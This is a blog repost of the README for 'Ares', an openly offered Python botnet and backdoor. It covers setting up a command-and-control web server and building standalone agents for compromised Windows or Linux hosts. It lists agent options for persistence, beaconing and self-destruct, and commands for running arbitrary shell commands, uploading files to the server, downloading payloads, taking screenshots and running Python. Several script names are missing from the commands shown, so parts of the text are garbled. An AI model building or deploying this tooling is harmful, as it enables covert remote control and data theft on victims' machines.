Ares - Python Botnet and Backdoor

Ares - Python Botnet and Backdoor

Ares is a Python-based remote access tool.

It is made of two main programs:
  • A Command and Control server, which is a Web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the CNC
  • The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.


Install the Python requirements:
pip install -r requirements.txt
Initialize the database:
cd server
./ initdb
In order to compile Windows agents on Linux, setup wine (optional):


Run with the builtin (debug) server:
./ runserver -h -p 8080 --threaded
Or run using gunicorn:
gunicorn ares:app -b --threads 20
The server should now be accessible on http://localhost:8080


Run the Python agent (update to suit your needs):
cd agent
Build a new agent to a standalone binary:
./ -p Linux --server http://localhost:8080 -o agent
To see a list of supported options, run ./ -h
./agent/ -h
usage: [-h] -p PLATFORM --server SERVER -o OUTPUT
[--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
[--max_failed_connections MAX_FAILED_CONNECTIONS]

Builds an Ares agent.

optional arguments:
-h, --help show this help message and exit
-p PLATFORM, --platform PLATFORM
Target platform (Windows, Linux).
--server SERVER Address of the CnC server (e.g http://localhost:8080).
-o OUTPUT, --output OUTPUT
Output file name.
--hello-interval HELLO_INTERVAL
Delay (in seconds) between each request to the CnC.
--idle_time IDLE_TIME
Inactivity time (in seconds) after which to go idle.
In idle mode, the agent pulls commands less often
(every <hello_interval> seconds).
--max_failed_connections MAX_FAILED_CONNECTIONS
The agent will self destruct if no contact with the
CnC can be made <max_failed_connections> times in a
--persistent Automatically install the agent on first run.

Supported agent commands:
<any shell command>
Executes the command in a shell and return its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

Takes a screenshot.

python <command|file>
Runs a Python command or local file.

Installs the agent.

Uninstalls the agent.

Kills the agent.

This help.

Ares - Python Botnet and Backdoor Ares - Python Botnet and Backdoor Reviewed by Dump3R H3id3gg3R on 2:03 AM Rating: 5